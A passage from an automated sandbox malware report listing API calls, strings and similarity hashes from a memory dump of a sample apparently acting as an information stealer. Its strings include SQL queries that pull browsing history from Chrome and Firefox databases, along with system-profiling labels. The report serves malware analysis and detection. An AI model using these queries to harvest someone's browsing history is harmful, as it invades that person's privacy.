                                                                                                            • Instruction Fuzzy Hash: 6C51FFB1A44209AFDB11DF95EC85FEF77BCAB48305F104066F604E7291CB786A84CB69
                                                                                                            APIs
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 0040269F
                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 004026A9
                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 004026C6
                                                                                                            • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 004026D0
                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 004026F9
                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 00402703
                                                                                                            • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 00402727
                                                                                                            • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,?,?,004195CF,?), ref: 00402731
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CharNext
                                                                                                            • String ID: "$"
                                                                                                            • API String ID: 3213498283-3758156766
                                                                                                            • Opcode ID: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
                                                                                                            • Instruction ID: 06a23872e8460c007548b42de0442a537cd71877075bfb16317ebbd4e879d901
                                                                                                            • Opcode Fuzzy Hash: c6d8730434dbc330e26cf7f014052777a241139f1a82d49c5bcfa5fb36d78824
                                                                                                            • Instruction Fuzzy Hash: 2D21E7546043D51ADB31297A0AC877A7B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 004129B8
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00412C78,?,.tmp,?,?,00000000,00412BB7,?,00000000,00412C41,?,00000000), ref: 00412A34
                                                                                                            • 6BD677D0.KERNEL32(00000000), ref: 00412BD5
                                                                                                            Strings
                                                                                                            • , xrefs: 00412B68
                                                                                                            • .tmp, xrefs: 004129D3
                                                                                                            • %TEMP%, xrefs: 004129F3
                                                                                                            • SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000, xrefs: 00412A9E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450D677Tick
                                                                                                            • String ID: $%TEMP%$.tmp$SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch") , urls.title , urls.url FROM urls, visits WHERE urls.id = visits.url ORDER By visits.visit_time DESC LIMIT 0, 10000
                                                                                                            • API String ID: 2092493435-351388873
                                                                                                            • Opcode ID: a74abbfddc2a804f33b1bec9982cfac16ef433aeb40967b99aae19c4185634a2
                                                                                                            • Instruction ID: f70f4eb6c3a4d74226b28448a77a1ad81309a428455034dfd3705b2b32de383d
                                                                                                            • Opcode Fuzzy Hash: a74abbfddc2a804f33b1bec9982cfac16ef433aeb40967b99aae19c4185634a2
                                                                                                            • Instruction Fuzzy Hash: C7810B71A00109AFCB00EF95DD82EDEBBB8EF48305F504476F514F72A1DB78AA558B58
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00412580
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00412840,?,.tmp,?,?,00000000,0041277F,?,00000000,00412809,?,00000000), ref: 004125FC
                                                                                                            • 6BD677D0.KERNEL32(00000000), ref: 0041279D
                                                                                                            Strings
                                                                                                            • SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000, xrefs: 00412666
                                                                                                            • .tmp, xrefs: 0041259B
                                                                                                            • , xrefs: 00412730
                                                                                                            • %TEMP%, xrefs: 004125BB
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450D677Tick
                                                                                                            • String ID: $%TEMP%$.tmp$SELECT DATETIME(moz_historyvisits.visit_date/1000000, "unixepoch", "localtime"),moz_places.title,moz_places.url FROM moz_places, moz_historyvisits WHERE moz_places.id = moz_historyvisits.place_id ORDER By moz_historyvisits.visit_date DESC LIMIT 0, 10000
                                                                                                            • API String ID: 2092493435-462058183
                                                                                                            • Opcode ID: f7e9225fd83f2c52edbe2e774f54d6d797bcc424be62889ade88ac8b0a8b95a9
                                                                                                            • Instruction ID: 96711d942fa6cd82f2097d7fbc3cef73731e9345f18fca2529b5113db019f3e4
                                                                                                            • Opcode Fuzzy Hash: f7e9225fd83f2c52edbe2e774f54d6d797bcc424be62889ade88ac8b0a8b95a9
                                                                                                            • Instruction Fuzzy Hash: 70810A71A00109AFDB00EB95DD82EDEBBB8EF48305F504536F414F72A1DB78AE568B58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00402A94: GetKeyboardType.USER32(00000000), ref: 00402A99
                                                                                                              • Part of subcall function 00402A94: GetKeyboardType.USER32(00000001), ref: 00402AA5
                                                                                                            • GetCommandLineA.KERNEL32 ref: 00404CD7
                                                                                                            • GetVersion.KERNEL32 ref: 00404CEB
                                                                                                            • GetVersion.KERNEL32 ref: 00404CFC
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 00404D38
                                                                                                              • Part of subcall function 00402AC4: 6BD67FA0.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                              • Part of subcall function 00402AC4: RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                              • Part of subcall function 00402AC4: 6BD67B60.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                            • GetThreadLocale.KERNEL32 ref: 00404D18
                                                                                                              • Part of subcall function 00404BA8: GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,00404C0E), ref: 00404BCE
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: KeyboardLocaleThreadTypeVersion$CommandCurrentInfoLineQueryValue
                                                                                                            • String ID: 85q
                                                                                                            • API String ID: 4194211594-1342893606
                                                                                                            • Opcode ID: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
                                                                                                            • Instruction ID: 1721a3a9195e16165242481212ff4b6f39af3106f899a404dc8ffc4097ba6689
                                                                                                            • Opcode Fuzzy Hash: c16a9bae5052d1d5fcf6e5d105fd87e92066834fdc2b316fa926a4ee5fff1b39
                                                                                                            • Instruction Fuzzy Hash: 210152F0881341D9D310BFB29C863893EA0AF89348F51C53FA2407A2F2D77D40448BAE
                                                                                                            APIs
                                                                                                            • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A232,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A232,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                                                                                                            • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A232,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A232,00000000,?,00403436), ref: 004033BC
                                                                                                            • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A232,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A232,00000000,?,00403436), ref: 004033C2
                                                                                                            • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 004033E0
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite$Message
                                                                                                            • String ID: Error$Runtime error at 00000000
                                                                                                            • API String ID: 1570097196-2970929446
                                                                                                            • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                            • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                                                                                                            • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                            • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411315
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            • 6BD677D0.KERNEL32(00000000), ref: 00411544
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450D677Tick
                                                                                                            • String ID: $%TEMP%$.tmp
                                                                                                            • API String ID: 2092493435-2792595090
                                                                                                            • Opcode ID: db1cd16a4fb912c04a68405bb93bc2507ea4c30ea1d340a0ead4ef04d239a916
                                                                                                            • Instruction ID: 2907a0a36d16f86ef06436b94052184e29eddf1806116983537aed2fe47c33e4
                                                                                                            • Opcode Fuzzy Hash: db1cd16a4fb912c04a68405bb93bc2507ea4c30ea1d340a0ead4ef04d239a916
                                                                                                            • Instruction Fuzzy Hash: 8C81F871A00109AFDB00EF95DC82EDEBBB9EF49305F508436F514F72A1DB38AA458B59
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,00000000,0040C0DE,?,00000000,?,00000000), ref: 0040BF04
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF0A
                                                                                                            • LoadLibraryA.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040BF5C
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF79
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BF8E
                                                                                                            • GetProcAddress.KERNEL32(00000000,00000000), ref: 0040BFA3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$LibraryLoad
                                                                                                            • String ID:
                                                                                                            • API String ID: 2238633743-0
                                                                                                            • Opcode ID: 70de9e30ba6dd60e2478134cb3d455c36d88d80a3fb17b1fee90f1f096944140
                                                                                                            • Instruction ID: 0e090bdfc3d65a5bca4157f74653ebb500d09f599f80782c5ae309756f7fedfb
                                                                                                            • Opcode Fuzzy Hash: 70de9e30ba6dd60e2478134cb3d455c36d88d80a3fb17b1fee90f1f096944140
                                                                                                            • Instruction Fuzzy Hash: A661A9B5A00209DFDB00EFA5C881A9EB7BDFF49304B50457AE914F7391D638ED458BA8
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00410DCC
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,00411018,?,.tmp,?,?,00000000,00410F66,?,00000000,00410FE1,?,00000000), ref: 00410E48
                                                                                                            • 6BD677D0.KERNEL32(00000000), ref: 00410F84
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450D677Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2092493435-3650661790
                                                                                                            • Opcode ID: 52a40d82767056af8fc75b760fd5bf277d3ec1bd90016c77cebdb1831855ff50
                                                                                                            • Instruction ID: ee23a472d3747a439df3c4e0a114333c5db2ab7a39ff8a49f746a70128ed8489
                                                                                                            • Opcode Fuzzy Hash: 52a40d82767056af8fc75b760fd5bf277d3ec1bd90016c77cebdb1831855ff50
                                                                                                            • Instruction Fuzzy Hash: F0611A71A00109AFCB10EF95DC42ADEBBB8EF48315F504476F514F32A1DB79AE468B58
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411078
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                                                                                                            • 6BD677D0.KERNEL32(00000000), ref: 00411230
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450D677Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2092493435-3650661790
                                                                                                            • Opcode ID: 3f235d18d13c86ff430b1fb222f05703180447fa8830be5146bc8e03c8a55f78
                                                                                                            • Instruction ID: b158b585ad64a0e2cffbc60e29a794732e4ff4356334f001507f487ecad874f7
                                                                                                            • Opcode Fuzzy Hash: 3f235d18d13c86ff430b1fb222f05703180447fa8830be5146bc8e03c8a55f78
                                                                                                            • Instruction Fuzzy Hash: E4611975A00109AFDB00EB95DC82ADEBBF8EF49314F504076F514F32A1DA38AE458B58
                                                                                                            APIs
                                                                                                            • 6BD67FA0.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                            • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                            • 6BD67B60.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: QueryValue
                                                                                                            • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                            • API String ID: 3660427363-4173385793
                                                                                                            • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                            • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                                                                                                            • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                            • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A4C,00000000,00416D10,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406684
                                                                                                            • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0040668A
                                                                                                            • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066F8,?,00416A4C,00000000,00416D10,?,Windows : ,?,,?), ref: 0040669B
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                            • String ID: IsWow64Process$kernel32.dll
                                                                                                            • API String ID: 4190356694-3024904723
                                                                                                            • Opcode ID: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
                                                                                                            • Instruction ID: e294de711800d21e639c3a9fa9d3456d397d027599023024eec292f5251465af
                                                                                                            • Opcode Fuzzy Hash: e1b52431ba51a17f73fa2707c1d3f9594f1716fb178e982d40455343ef0f00aa
                                                                                                            • Instruction Fuzzy Hash: 1FE09BB16147019EDB007BB58C41B3B21CCAB65305F031C3EA082F12C0D97EC8908A6D
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411315
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: dfa750a07d6b472cd75f50a97ce69af4c84a8d84dfcfe63392ef10f97b45f9bb
                                                                                                            • Instruction ID: 1a8257de2d60cbb0d3980c7fc3a6a2139cbe43d2aa84506a9aa105e6b37338cb
                                                                                                            • Opcode Fuzzy Hash: dfa750a07d6b472cd75f50a97ce69af4c84a8d84dfcfe63392ef10f97b45f9bb
                                                                                                            • Instruction Fuzzy Hash: 1B414231904248AFDB01FFA2D852ACDBBB9EF45309F51447BF500B76A2D63CAE058B25
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411315
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: 1a1e78d5433c9708098c6bc8c205f43e83ad122134c42980d47e7c9e79c26488
                                                                                                            • Instruction ID: e7bb21d7818b23da26e47d5e8aee7b9a5bdfdedc2a4558b21973e4c2dc324f20
                                                                                                            • Opcode Fuzzy Hash: 1a1e78d5433c9708098c6bc8c205f43e83ad122134c42980d47e7c9e79c26488
                                                                                                            • Instruction Fuzzy Hash: 01413571904108AFDB01FFA2D842ACDBBB9EF45309F51447BF505B36A2D63CAE068A24
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411315
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004115E4,?,.tmp,?,?,00000000,00411526,?,00000000,004115AB,?,00000000), ref: 00411391
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: 0f6dc28d25e31742a3d83fd8ff35710f0af691a996f022fb8dd6efbb7f893fac
                                                                                                            • Instruction ID: 8afa6536208aa5b6f57682845dada9e2518f3e9b5e83f9eef4c4991f65faefc0
                                                                                                            • Opcode Fuzzy Hash: 0f6dc28d25e31742a3d83fd8ff35710f0af691a996f022fb8dd6efbb7f893fac
                                                                                                            • Instruction Fuzzy Hash: 7F414631900108AFDB01FF92D842ACDFBB9EF44309F50447BF504B36A2D63CAE058A14
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411078
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: 960af96c6d180e36fedad193f267724433eed7366dc03900526dc00d0c7d43f2
                                                                                                            • Instruction ID: 086439bef84ae03ebcf91c6f71c22103effc3d3d1ef1d95b9ffc13b6feb758dd
                                                                                                            • Opcode Fuzzy Hash: 960af96c6d180e36fedad193f267724433eed7366dc03900526dc00d0c7d43f2
                                                                                                            • Instruction Fuzzy Hash: 53315531904108AFDB01FFA1D942ADDBBB9EF49304F50447BF504B36A2D738AE069A58
                                                                                                            APIs
                                                                                                            • GetTickCount.KERNEL32 ref: 00411078
                                                                                                            • 6BD67450.KERNEL32(00000000,00000000,000000FF,?,004112B8,?,.tmp,?,?,00000000,00411212,?,00000000,00411282,?,00000000), ref: 004110F4
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CountD67450Tick
                                                                                                            • String ID: %TEMP%$.tmp
                                                                                                            • API String ID: 2236513053-3650661790
                                                                                                            • Opcode ID: 23a8ec0390782e8a3a87181899651e63f82f7ff95d198a39a33ed47c794eaa64
                                                                                                            • Instruction ID: c9e68ca033382928e780bbb2ca05a045859d404701f4d2a11d4424a3b4ff7e89
                                                                                                            • Opcode Fuzzy Hash: 23a8ec0390782e8a3a87181899651e63f82f7ff95d198a39a33ed47c794eaa64
                                                                                                            • Instruction Fuzzy Hash: FA313531900109AEDB01FF91D942ADDBBB9EF48305F50457BF504B26A2D738AE059A58
                                                                                                            APIs
                                                                                                            • LoadLibraryA.KERNEL32(dnsapi.dll,DnsQuery_A,00000000,0041763E,?,00000000,00000011,00000000), ref: 004175CD
                                                                                                            • GetProcAddress.KERNEL32(00000000,dnsapi.dll), ref: 004175D3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000015.00000002.2482970725.0000000000401000.00000020.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            • Associated: 00000015.00000002.2482924448.0000000000400000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                            • Associated: 00000015.00000002.2483023563.000000000041B000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_21_2_400000_update.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AddressLibraryLoadProc
